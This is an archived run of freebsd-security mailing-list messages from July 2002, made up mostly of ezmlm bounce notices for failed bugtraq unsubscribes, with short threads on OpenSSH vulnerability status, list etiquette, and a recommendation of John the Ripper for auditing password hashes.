commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19297 invoked from network); 29 Jun 2002 03:41:45 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:45 -0000 > Received: (qmail 9149 invoked by alias); 29 Jun 2002 03:37:02 -0000 > Received: (qmail 9145 invoked from network); 29 Jun 2002 03:37:02 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:37:02 -0000 > Received: (qmail 14047 invoked by uid 1001); 29 Jun 2002 03:40:37 -0000 > Date: 29 Jun 2002 03:40:36 -0000 > Message-ID: <20020629034036.14046.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 3:59:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CB67837B405 for ; Tue, 2 Jul 2002 03:59:26 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 28A7243E35 for ; Tue, 2 Jul 2002 03:58:53 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 13365 invoked by alias); 2 Jul 2002 10:56:24 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 10:56:24 -0000 Message-ID: <1025607384.13364.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 13358 invoked from network); 2 Jul 2002 10:56:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:24 -0000 Received: (qmail 29140 invoked by alias); 2 Jul 2002 10:51:59 -0000 Received: (qmail 29136 invoked from network); 2 Jul 2002 10:51:58 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:51:58 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 13358 invoked from network); 2 Jul 2002 10:56:24 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 10:56:24 -0000 Received: (qmail 29140 invoked by alias); 2 Jul 2002 10:51:59 -0000 Received: (qmail 29136 invoked from network); 2 Jul 2002 10:51:58 -0000 Received: from socrates.thinkhost.com (209.61.191.75) by mail.securityfocus.com with SMTP; 2 Jul 2002 10:51:58 -0000 Received: (from davidzon@localhost) by socrates.thinkhost.com (8.11.6/8.11.4) id g62Avke81151; Tue, 2 Jul 2002 06:57:46 -0400 (EDT) (envelope-from davidzon) Date: Tue, 2 Jul 2002 06:57:46 -0400 (EDT) From: "Vladislav S. Davidzon" To: bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com cc: freebsd-security@FreeBSD.ORG Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025322076.19222.ezmlm@securityfocus.com> Message-ID: <20020702065745.G80520-100000@socrates.thinkhost.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII On 29 Jun 2002 bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > freebsd-security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025322076.bgnihhdfjjpjepcjicph-freebsd-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 19217 invoked from network); 29 Jun 2002 03:41:16 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 03:41:16 -0000 > Received: (qmail 9057 invoked by alias); 29 Jun 2002 03:36:34 -0000 > Received: (qmail 9053 invoked from network); 29 Jun 2002 03:36:34 -0000 > Received: from www5.securityfocus.com (HELO mail.securityfocus.com) (66.38.151.15) > by mail.securityfocus.com with SMTP; 29 Jun 2002 03:36:34 -0000 > Received: (qmail 13950 invoked by uid 1001); 29 Jun 2002 03:40:08 -0000 > Date: 29 Jun 2002 03:40:08 -0000 > Message-ID: <20020629034008.13949.qmail@mail.securityfocus.com> > From: root@mail.securityfocus.com > Content-Type: text/plain > Content-Disposition: inline > Content-Transfer-Encoding: binary > MIME-Version: 1.0 > X-Mailer: MIME-tools 5.411 (Entity 5.404) > To: bugtraq-unsubscribe-freebsd-security=freebsd.org@securityfocus.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 4:23:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B16B737B400 for ; Tue, 2 Jul 2002 04:23:08 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 1BAAF43E13 for ; Tue, 2 Jul 2002 04:23:08 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 14624 invoked by alias); 2 Jul 2002 11:21:41 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 11:21:41 -0000 Message-ID: <1025608901.14623.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: freebsd-security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 14618 invoked from network); 2 Jul 2002 11:21:41 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:41 -0000 Received: (qmail 30426 invoked by alias); 2 Jul 2002 11:17:16 -0000 Received: (qmail 30416 invoked from network); 2 Jul 2002 11:17:13 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:13 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id BC5775509 for ; Tue, 2 Jul 2002 13:22:30 +0200 (CEST) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address freebsd-security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14618 invoked from network); 2 Jul 2002 11:21:41 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:41 -0000 Received: (qmail 30426 invoked by alias); 2 Jul 2002 11:17:16 -0000 Received: (qmail 30416 invoked from network); 2 Jul 2002 11:17:13 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:13 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id BC5775509 for ; Tue, 2 Jul 2002 13:22:30 +0200 (CEST) Message-ID: <00ce01c221ba$c077b720$fb00a8c0@uber> From: =?iso-8859-1?Q?Christer_S=F6derlund?= To: Subject: Date: Tue, 2 Jul 2002 13:22:29 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 4:23:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 085F537B400 for ; Tue, 2 Jul 2002 04:23:27 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 1752B43E35 for ; Tue, 2 Jul 2002 04:23:25 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 14728 invoked by alias); 2 Jul 2002 11:21:58 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 2 Jul 2002 11:21:58 -0000 Message-ID: <1025608918.14727.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 14722 invoked from network); 2 Jul 2002 11:21:58 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:58 -0000 Received: (qmail 30479 invoked by alias); 2 Jul 2002 11:17:33 -0000 Received: (qmail 30448 invoked from network); 2 Jul 2002 11:17:30 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:30 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id 97FC857AA for ; Tue, 2 Jul 2002 13:22:57 +0200 (CEST) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 14722 invoked from network); 2 Jul 2002 11:21:58 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 2 Jul 2002 11:21:58 -0000 Received: (qmail 30479 invoked by alias); 2 Jul 2002 11:17:33 -0000 Received: (qmail 30448 invoked from network); 2 Jul 2002 11:17:30 -0000 Received: from h65n1fls21o70.telia.com (HELO hardcampa) (213.66.190.65) by mail.securityfocus.com with SMTP; 2 Jul 2002 11:17:30 -0000 Received: from uber (brewery [192.168.0.251]) by hardcampa (Postfix) with SMTP id 97FC857AA for ; Tue, 2 Jul 2002 13:22:57 +0200 (CEST) Message-ID: <00dc01c221ba$d0788c30$fb00a8c0@uber> From: =?iso-8859-1?Q?Christer_S=F6derlund?= To: Subject: Date: Tue, 2 Jul 2002 13:22:56 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 5:50:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 94E5137B400 for ; Tue, 2 Jul 2002 05:50:30 -0700 (PDT) Received: from newmail.skyrunner.net (newmail.skyrunner.net [208.133.44.6]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4C19543E3B for ; Tue, 2 Jul 2002 05:50:29 -0700 (PDT) (envelope-from peter@skyrunner.net) Received: from micron (athena.skyrunner.net [208.150.25.130]) by newmail.skyrunner.net (8.11.2/8.11.0/SuSE Linux 8.11.0-0.4) with SMTP id g62CpaK04024 for ; Tue, 2 Jul 2002 08:51:36 -0400 From: "Peter Brezny" To: Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Date: Tue, 2 Jul 2002 08:47:37 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I've been trying to get clear on whether or not freebsd-stable (4.6-STABLE FreeBSD 4.6-STABLE #0: Sat Jun 29 00:37:13 EDT 2002) has resolved the problem listed in CA-2002-18 from CERT. it doesn't appear so since it's running Openssh_2.9 and http://openssh.org/txt/preauth.adv clearly says that freebsd is vulnerable. I _THOUGHT_ i found something on the freebsd site stating that OpenSSH_2.9 FreeBSD localisations 20020307 was not vulnerable, however, I can't find it now. Since there doesn't appear to be a security advisory or notice from the freebsd security team on this one yet, what's the best thing to do? Manually update to openssh 3.4? Is an update to the base system in the works? TIA Peter Brezny Skyrunner.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 5:53:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 42A3237B400 for ; Tue, 2 Jul 2002 05:53:53 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id C9D6843E09 for ; Tue, 2 Jul 2002 05:53:52 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 72B26534A; Tue, 2 Jul 2002 14:53:50 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Chris McCluskey" Cc: Subject: Re: FW: Which SSH now (and when)? References: From: Dag-Erling Smorgrav Date: 02 Jul 2002 14:53:49 +0200 In-Reply-To: Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org "Chris McCluskey" writes: > FreeBSD (4.5) SSH in the system source is (or was) built from > OpenSSH3.3? No, OpenSSH 2.9 (OpenBSD version, not "portable" version), which is not vulnerable to the holes reported by ISS. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 6: 8:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DCFD537B401 for ; Tue, 2 Jul 2002 06:08:49 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0942843E0A for ; Tue, 2 Jul 2002 06:08:49 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id HAA17917; Tue, 2 Jul 2002 07:08:27 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020702070542.02469b10@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 02 Jul 2002 07:08:16 -0600 To: Colin Faber From: Brett Glass Subject: Re: Low-volume list Cc: Michael Bryan , freebsd-security@FreeBSD.ORG In-Reply-To: <3D216380.2E145DF3@fpsn.net> References: <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020701210911.022a3650@localhost> <4.3.2.7.2.20020702021318.00d4d740@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 02:25 AM 7/2/2002, Colin Faber wrote: >What complaints, > >The only thing I see on here time after time are complaints about the >endless stream of bogus posts from you Brett. Maybe, then, you should quit posting so many complaints? Especially since my postings are NOT bogus, as many folks have told me in private mail. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 6:33:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 32C1F37B400 for ; Tue, 2 Jul 2002 06:33:28 -0700 (PDT) Received: from mail.drkshdw.org (user205.net239.fl.sprint-hsd.net [209.26.20.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id 09A8F43E0A for ; Tue, 2 Jul 2002 06:33:27 -0700 (PDT) (envelope-from scorpio@drkshdw.org) Received: (qmail 18281 invoked by uid 85); 2 Jul 2002 13:34:06 -0000 Received: from scorpio@drkshdw.org by scorpio.DrkShdw.org by uid 82 with qmail-scanner-1.12 (uvscan: v4.1.60/v4205. spamassassin: 2.20. . Clear:. Processed in 0.795443 secs); 02 Jul 2002 13:34:06 -0000 Received: from unknown (HELO jeff.drkshdw.org) (192.168.134.2) by user205.net239.fl.sprint-hsd.net with SMTP; 2 Jul 2002 13:34:05 -0000 Message-Id: <5.1.1.6.0.20020702092653.00b16128@mail.drkshdw.org> X-Sender: scorpio@mail.drkshdw.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 02 Jul 2002 09:33:25 -0400 To: Patrick Cahalan From: Jeff Palmer Subject: Re: I'll volunteer Cc: security@freebsd.org In-Reply-To: <20020701180053.B96837-100000@erie.pas.lab> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'll second this notion, and volunteer as well. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 6:36:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0ED4337B400 for ; Tue, 2 Jul 2002 06:36:13 -0700 (PDT) Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7218243E0A for ; Tue, 2 Jul 2002 06:36:12 -0700 (PDT) (envelope-from anderson@centtech.com) Received: from sprint.centtech.com (sprint.centtech.com [10.177.173.31]) by proxy.centtech.com (8.11.6/8.11.6) with ESMTP id g62DaB107713 for ; Tue, 2 Jul 2002 08:36:11 -0500 (CDT) Received: (from root@localhost) by sprint.centtech.com (8.11.6+Sun/8.11.6) id g62DaBb02322 for freebsd-security@freebsd.org; Tue, 2 Jul 2002 08:36:11 -0500 (CDT) Received: from centtech.com (proton [10.177.173.77]) by sprint.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g62Da8502307 for ; Tue, 2 Jul 2002 08:36:08 -0500 (CDT) Message-ID: <3D21AC48.3E2C1BC1@centtech.com> Date: Tue, 02 Jul 2002 08:36:08 -0500 From: Eric Anderson X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: password crackers? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What does everyone recommend for a general password file cracker? I have been using an old version of crack, but there must be better ones around. I need to crack solaris, freebsd, and linux password hashes. Any recommendations? Eric -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology He who laughs last didn't get the joke. ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jul 2 6:39:12 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7792A37B400 for ; Tue, 2 Jul 2002 06:39:10 -0700 (PDT) Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 91AE943E13 for ; Tue, 2 Jul 2002 06:39:08 -0700 (PDT) (envelope-from fschapachnik@vianetworks.com.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.11.6/8.11.6) id g62Dcm474405; Tue, 2 Jul 2002 10:38:48 -0300 (ART) (envelope-from fschapachnik@vianetworks.com.ar) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Tue, 2 Jul 2002 10:38:48 -0300 From: Fernando Schapachnik To: Eric Anderson Cc: freebsd-security@FreeBSD.ORG Subject: Re: password crackers? Message-ID: <20020702103848.D898@ns1.via-net-works.net.ar> References: <3D21AC48.3E2C1BC1@centtech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <3D21AC48.3E2C1BC1@centtech.com>; from anderson@centtech.com on Tue, Jul 02, 2002 at 08:36:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org cat /usr/ports/security/john/pkg-descr John the Ripper is a UNIX password cracker, currently available for UNIX (tested with Linux x86, FreeBSD x86, Solaris 2.x SPARC, OSF/1 Alpha), DOS, WinNT/Win95. John the Ripper supports the following cracking modes: - wordlist with or without rules; - "single crack", makes use of the login/GECOS information; - incremental, tries all character combinations; - external, allows you to define your own cracking mode. - MD5 based password files support En un mensaje anterior, Eric Anderson escribió: > What does everyone recommend for a general password file cracker? I have been > using an old version of crack, but there must be better ones around. I need to > crack solaris, freebsd, and linux password hashes. Any recommendations? Lic. Fernando P. Schapachnik fschapachnik@vianetworks.com.ar To 